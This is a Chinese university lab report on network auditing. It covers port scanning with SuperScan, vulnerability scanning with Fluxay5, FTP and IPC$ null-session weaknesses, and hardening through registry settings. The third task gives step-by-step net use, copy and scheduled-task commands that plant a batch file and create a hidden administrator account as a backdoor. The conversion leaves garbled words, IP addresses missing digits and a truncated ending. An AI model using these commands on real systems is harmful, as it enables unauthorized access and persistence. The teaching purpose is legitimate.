網(wǎng)絡審計實驗報告

試驗三：網(wǎng)絡審計試驗試驗目的使學生掌握網(wǎng)絡端口掃描器的使用措施，熟悉常見端口和其對應的服務程序，掌握發(fā)現(xiàn)系統(tǒng)漏洞的措施。掌握綜合掃描及安全評估工具的使用措施，理解進行簡樸系統(tǒng)漏洞入侵的措施，理解常見的網(wǎng)絡和系統(tǒng)漏洞以及其安全防護措施。試驗環(huán)境（試驗所使用的器件、儀器設備名稱及規(guī)格）Windows操作系統(tǒng)、SuperScan端口掃描工具、流光Fluxay5綜合掃描工具。試驗任務及其規(guī)定任務一：使用Superscan端口掃描工具并分析成果。任務二：使用綜合掃描工具Fluxay5并分析成果。任務三：進行簡樸的襲擊。試驗過程及分析任務一：使用Superscan端口掃描工具并分析成果分組角色：學生A、學生B互相掃描對方主機。試驗環(huán)節(jié)：（1）在命令符提醒下輸入IPCONFIG查詢自己的IP地址（本機的IP地址為0對方的IP地址為）。（2）在Superscan中的HostnameLookup欄中，輸入同組學生主機的IP地址（），可通過單擊Lookup按鈕獲得主機名（如圖1所示）。圖1獲得對方主機顧客名設置IP欄、Scantype欄、Scan欄，使其對同組學生主機的所有端口以默認的時間參數(shù)進行掃描（如圖2所示）。圖2配置掃描參數(shù)根據(jù)掃描成果分析主機開放的端口類型和對應的服務程序（如圖3所示）。圖3掃描成果通過“控制面板”的“管理工具”中的“服務”配置(如圖4所示)，嘗試關閉或開放目標主機上的部分服務，重新掃描，觀測掃描成果的變化。圖4查看未修改時服務狀態(tài)常見端口的關閉措施：1、關閉79等端口：關閉SimpleTCP/IPService,支持如下TCP/IP服務：CharacterGenerator,Daytime,Discard,Echo,以及QuoteoftheDay。關閉80端口：關掉WWW服務。在“服務”中顯示名稱為“WorldWideWebPublishingService”，通過Internet信息服務的管理單元提供Web連接和管理。3、關掉25端口：關閉SimpleMailTransportProtocol(SMTP)服務，它提供的功能是跨網(wǎng)傳送電子郵件。4、關掉21端口：關閉FTPPublishingService,它提供的服務是通過Internet信息服務的管理單元提供FTP連接和管理。5、關掉23端口：關閉Telnet服務，它容許遠程顧客登錄到系統(tǒng)并且使用命令行運行控制臺程序。6、關掉139端口，139端口是NetBIOS Session端口，用來文獻和打印共享，關閉139口聽措施是在“網(wǎng)絡和撥號連接”中“當?shù)剡B接”中選用“Internet協(xié)議(TCP/IP)”屬性，進入“高級TCP/IP設置”“WINS設置”里面有一項“禁用TCP/IP的NETBIOS”，打勾就關閉了139端口（如圖5所示）。圖5關掉139端口運用TCP/IP篩選：網(wǎng)上鄰居屬性-當?shù)剡B接屬性-常規(guī)-internet協(xié)議(TCP/IP)屬性-高級-選項-TCP/IP篩選-屬性-TCP端口-只容許139，445，這樣其他端口就都被關閉了（如圖6、7所示）。圖6只容許139,445通過圖7成果掃描圖任務二：使用綜合掃描工具Fluxay5并分析成果圖8各部份功能圖1:暴力破解的設置區(qū)域2：控制臺輸出3：掃描出來的經(jīng)典漏洞列表4：掃描或者暴力破解成功的顧客帳號5：掃描和暴力破解的速度控制6：掃描和暴力破解時的狀態(tài)顯示7：中斷按鈕8：探測記錄查找基本設置如下（如圖9所示）：圖9基本設置圖選擇“文獻（F）”→“高級掃描向導（W）”可打開高級掃描向導，設置掃描參數(shù)。掃描結束后，流光會自動打開HTML格式的掃描匯報，并且還把可運用的主機列在流光界面的最下方。單擊主機列表中的主機便可以直接對目的主機進行連接操作（如圖10所示）對目的主機進行連接操作示意圖除了使用“高級掃描向導”配置高級掃描外，還可以在探測菜單中直接選用高級掃描工具設置（如圖11所示）：圖11探測菜單中直接選用高級掃描工具設置圖分組角色：學生A、學生B互相掃描對方主機。試驗環(huán)節(jié)：開放FTP服務，容許匿名連接（此處掃描的主機IP地址為45）。（2）打開流光FLUXAY5工具，使用“高級掃描向導”進行設置，使其能對同組學生主機的所有端口、服務、漏洞、所有顧客等進行全面的掃描（如圖12所示）。圖12掃描成果（3）仔細觀測掃描成果，分析同組學生主機上存在的多種漏洞。（4）根據(jù)掃描成果分析FTP漏洞：如成果顯示有漏洞，則運用“流光”提供的入侵菜單進行FTP連接，嘗試上傳或下載文獻（如圖13、14所示）。圖13建立ftp連接圖14嘗試上傳文獻（5）根據(jù)掃描成果分析IPC$漏洞：IPC是為了讓進程間通信而開放的命名管道，可以通過驗證顧客名和密碼獲得對應的權限，在遠程管理計算機和查看計算機的共享資源時使用。運用IPC$,連接者可以與目的主機建立一種空連接而無需顧客名和密碼，從而可以得到目的主機上的顧客列表，并也許破解顧客密碼。IPC$有關命令：建立和目的的ipc$連接命令：netuse\\目的IP\ipc$“密碼”/user:“ADMIN”（管理員賬號），如：netuse\\28\ipc$“”/user:"administrator"；映射網(wǎng)絡驅動器命令（將目的主機的盤映射到當?shù)卮疟P）：netuse當?shù)乇P符\\目的IP\盤符$，如：netusez:\\28\c$；和目的建立了ipc$后，則可直接用IP加盤符加$訪問。例如：copy文獻名\\IP\盤符$\途徑\文獻名，如：copyhack.bat\\28\c$，也可直接對映射為當?shù)卮疟P的網(wǎng)絡驅動器操作。4.管理計算機上面的賬號命令：netuser查看賬號命令：netuser建立賬號命令：netusernamepasswd/add(netusersysbak123456/add:添加顧客名為sysback，密碼為123456的賬號)刪除賬號命令：netusername/delete管理工作組命令：netlocalgroup組名顧客名/add[delete] 如：netlocalgroupadministratorssysback/add。該命令表達把sysback顧客添加到管理員組（administrators）。6.查看目的計算機的系統(tǒng)時間：nettime\\ip7.在遠程主機上建立計劃任務：at\\IPTIMECOMMANDat\\2813:45c:\hack.bat（該命令表達在下午13點45分執(zhí)行目的主機C盤中的hack.bat文獻，時間一定要晚于目前遠程主機系統(tǒng)時間）刪除和目的的ipc$鏈接命令：netuse\\IP\ipc$/del斷開所有ipc$鏈接：netuse*/del嚴禁建立空連接：運行regedit，找到主鍵 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]，把Restrict Anonymous（DWORD）的鍵值改為：00000001.嚴禁自動打開默認共享：找到主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]，把AutoShareServer(DWORD)的鍵值改為：00000000，假如不存在，就新建一種該鍵值。任務三：運用破解的顧客ADMINISTRATOR對目的主機進行留后門入侵，環(huán)節(jié)：編寫批處理文獻hack.bat，文獻中包括兩個命令：1）建立一種賬號，2）將新賬號加入administrators組。使用net命令與目的主機進行連接。將批處理文獻hack.bat拷貝到目的主機上。通過計劃任務使目的主機執(zhí)行hack.bat文獻。斷開所有ipc$連接。通過采用新賬號與目的主機建立連接來驗證賬號與否成功建立。刪除和目的主機的連接。執(zhí)行安全防護措施：目的主機對注冊